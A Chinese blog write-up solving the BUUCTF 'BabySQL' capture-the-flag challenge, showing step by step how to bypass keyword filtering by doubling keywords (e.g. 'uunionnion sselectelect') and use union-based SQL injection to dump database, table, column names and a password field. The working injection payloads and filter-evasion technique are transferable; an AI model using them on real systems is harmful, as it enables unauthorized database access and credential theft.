2025.1.16——六、BabySQL 双写绕过|联合注入

题目来源:buuctf [极客大挑战 2019]BabySQL 1

目录

一、打开靶机,分析已知信息

二、手工注入解题

[step 1:万能密码](#step 1:万能密码)

[step 2:正常注入,判断字段数](#step 2:正常注入,判断字段数)

[step 3:绕过](#step 3:绕过)

[step 4:查数据库](#step 4:查数据库)

[step 5:查表名](#step 5:查表名)

[step 6:查列名](#step 6:查列名)

[step 7:查数据](#step 7:查数据)

三、小结

1.绕过方式

2.查数据库名和表名可以合二为一


一、打开靶机,分析已知信息

仍为SQL注入系列,提示:有关键字过滤

二、手工注入解题

step 1:万能密码

sql 复制代码
username=admin&password=admin' or '1'='1
sql 复制代码
username=admin'&password=admin or '1'='1

发现万能密码失效了,两种密码结果不同是因为的单引号位置不同,导致闭合情况不同

step 2:正常注入,判断字段数

sql 复制代码
username=1' order by 3%23&password=1

发现or和by都被过滤了

再用

username=admin&password=1' union select 1,where

发现union select where 都被过滤了

过滤:有可能用函数将这些关键字替换成了空白字符

所以要进行绕过

step 3:绕过

尝试过后发现大小写绕过失效,所以尝试双写绕过,没问题,则利用双写关键字进行注入

但这里order by还是无法使用,所以用联合查询直接进行尝试

1.尝试两个字段

sql 复制代码
username=admin&password=1' uunionnion sselectelect 1,2%23

出现错误,有可能列数错误,继续尝试

2.尝试三个字段

sql 复制代码
username=admin&password=1' uunionnion sselectelect 1,2,3%23

回显正常了,且回显点为2,3位置

step 4:查数据库

sql 复制代码
username=admin&password=1' uunionnion sselectelect 1,2,database()%23

数据库名为geek

step 5:查表名

sql 复制代码
username=admin&password=1' uunionnion sselectelect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema='geek'%23

得到表名b4bsql

step 6:查列名

sql 复制代码
username=admin&password=1' uunionnion sselectelect 1,2,group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'%23

其中password很可疑

step 7:查数据

sql 复制代码
username=admin&password=1' uunionnion sselectelect 1,2,group_concat(passwoorrd) ffromrom geek.b4bsql%23

从源码中得具体信息:flag{14a8c091-b278-4155-a56e-c663801feb59}

三、小结

1.绕过方式

如大小写绕过,双写绕过(双关键字绕过,如Uunionnion,第一个字母后跟原关键字)

SQL注入一些过滤及绕过总结_sql注入过滤-CSDN博客

2.查数据库名和表名可以合二为一

如:username=admin&password=1' uunionnion sselectelect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23

相关推荐
MuYiLuck7 分钟前
【redis实战篇】第八天
数据库·redis·缓存
睡觉待开机8 分钟前
6. MySQL基本查询
数据库·mysql
陳麦冬13 分钟前
深入理解指针(二)
c语言·学习
mooyuan天天28 分钟前
pikachu靶场通关笔记15 CSRF关卡01-CSRF(GET)
web安全·csrf·pikachu靶场·csrf漏洞
大熊猫侯佩1 小时前
由一个 SwiftData “诡异”运行时崩溃而引发的钩深索隐(三)
数据库·swiftui·swift
大熊猫侯佩1 小时前
由一个 SwiftData “诡异”运行时崩溃而引发的钩深索隐(二)
数据库·swiftui·swift
大熊猫侯佩1 小时前
用异步序列优雅的监听 SwiftData 2.0 中历史追踪记录(History Trace)的变化
数据库·swiftui·swift
大熊猫侯佩1 小时前
由一个 SwiftData “诡异”运行时崩溃而引发的钩深索隐(一)
数据库·swiftui·swift
Ares-Wang1 小时前
负载均衡LB》》HAproxy
运维·数据库·负载均衡
2501_916007471 小时前
绕过 Xcode?使用 Appuploader和主流工具实现 iOS 上架自动化
websocket·网络协议·tcp/ip·http·网络安全·https·udp